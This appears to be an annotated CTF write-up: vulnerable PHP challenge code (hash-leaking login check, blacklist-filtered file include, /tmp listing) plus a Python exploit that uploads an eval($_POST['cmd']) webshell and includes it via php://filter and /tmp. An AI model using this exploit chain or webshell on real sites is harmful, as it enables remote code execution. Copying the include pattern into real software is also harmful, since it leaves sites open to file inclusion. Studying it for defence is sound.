Set-Cookie: Hash=fa25e54758d5d5c1927781a6ede89f8a; expires=Fri, 25-Feb-2022 05:50:05 GMT; Max-Age=3600000
<?php
// Login check of the challenge's index page: compares md5($secret.$name) with the
// client-supplied 'pass' and, on a match, emits a JavaScript redirect to flflflflag.php.
// $secret is not defined in this snippet; presumably it comes from config.php.
include 'config.php';
// '@' only hides the undefined-index notice when a parameter is missing; the variable
// is then null. Both values arrive in the query string, so they also end up in
// access logs, browser history and Referer headers.
@$name=$_GET['name'];
@$pass=$_GET['pass'];
// NOTE(review): md5(secret . message) is a secret-prefix construction, not a keyed MAC,
// and '===' on strings is not a constant-time comparison. A keyed check would use
// hash_hmac() for the digest and hash_equals() for the comparison.
if(md5($secret.$name)===$pass){
// NOTE(review): the redirect runs in the browser and is the only gate visible here;
// flflflflag.php must enforce its own server-side authorization.
echo '<script language="javascript" type="text/javascript">
window.location.href="flflflflag.php";
</script>
';
}else{
// NOTE(review): the failure path sends the expected digest for the submitted name back
// to the client in the "Hash" cookie, so the comparison above authenticates nothing.
// The cookie is also set without the Secure/HttpOnly options and with a lifetime of
// 3600000 seconds. An expected verifier value must never leave the server.
setcookie("Hash",md5($secret.$name),time()+3600000);
echo "username/password error";
}
?>
<html>
<!--md5($secret.$name)===$pass -->
</html>
<html>
<head>
<script language="javascript" type="text/javascript">
window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
</head>
<>
<body>
<?php
// Includes whatever path or stream the 'file' query parameter names, after a substring
// blacklist. The window.location redirect in this page's <head> runs in the browser
// only; this block has already executed on the server by then.
// $file is read without isset()/'??', so a request without 'file' raises a notice and
// passes null on.
$file=$_GET['file'];
// Rejects only values containing "data", "input" or "zip" (case-insensitive). Every
// other stream wrapper, relative path and absolute path passes through unchanged.
if(preg_match('/data|input|zip/is',$file)){
die('nonono');
}
// NOTE(review): request-controlled include() is a local file inclusion primitive; a
// blacklist cannot make it safe. The robust fix is to map the parameter onto a fixed
// allowlist of known files (e.g. an array lookup keyed by a short page name) and never
// pass request data to include/require. open_basedir and an upload_tmp_dir outside any
// includable location are defence in depth only.
// '@' suppresses the warning for a failed include, which also hides probing from the
// PHP error log.
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>
<?php
// Dumps the directory listing of /tmp into the response, with no access check in this
// snippet.
// NOTE(review): anyone who can reach or include this script sees every file name in
// /tmp, which includes PHP's upload temp files when upload_tmp_dir is left at the
// system default. Debug helpers like this should not be deployed under the web root.
var_dump(scandir('/tmp'));
?>
import requests
from io import BytesIO
import re
# Proof-of-concept from the write-up, aimed at the challenge instance's flflflflag.php.
# Defender's reading: each request below works only because that endpoint passes the
# `file` query parameter to include() behind a three-word blacklist, and because
# dir.php exposes the contents of /tmp.
# Signals worth alerting on: `php://` or absolute paths in a `file=` parameter,
# multipart bodies sent to an endpoint that defines no upload handling, and php* files
# lingering in /tmp.

# Multipart form with a single part: a PHP snippet that eval()s the POST field "cmd".
files = {
'file': BytesIO(b'<?php eval($_POST["cmd"]);?>')
}
# Request 1: multipart POST whose `file` parameter names a php://filter stream over
# index.php; none of the blacklisted words appear in it.
# NOTE(review): the response is never read. The script presumably relies on PHP having
# written the uploaded part to a temp file under /tmp that is still present for
# request 2. Confirm against the target's PHP version.
url1 = 'http://59a657ea-09e5-49b8-a6db-c271b6157877.node4.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=index.php'
r = requests.post(url=url1, files=files, allow_redirects=False)
# Request 2: includes dir.php through the same parameter; its var_dump(scandir('/tmp'))
# output is searched for the first token of the form "php" + alphanumerics.
url2 = 'http://59a657ea-09e5-49b8-a6db-c271b6157877.node4.buuoj.cn:81/flflflflag.php?file=dir.php'
r = requests.get(url2,allow_redirects=False)
# re.search() returns None when nothing matches, so .group(0) raises AttributeError if
# no such name is listed.
data = re.search(r"php[a-zA-Z0-9]{1,}", r.content.decode()).group(0)
print("++++++++++++++++++++++")
print(data)
print("++++++++++++++++++++++")
# Request 3: includes the discovered /tmp file by absolute path and posts "cmd"; the
# value sent here is only phpinfo(). `data` is rebound from the file name to the form
# fields after url3 has been built.
url3='http://59a657ea-09e5-49b8-a6db-c271b6157877.node4.buuoj.cn:81/flflflflag.php?file=/tmp/'+data
data = { 'cmd':"phpinfo();" }
r = requests.post(url=url3,data=data,allow_redirects=False)
print(r.content)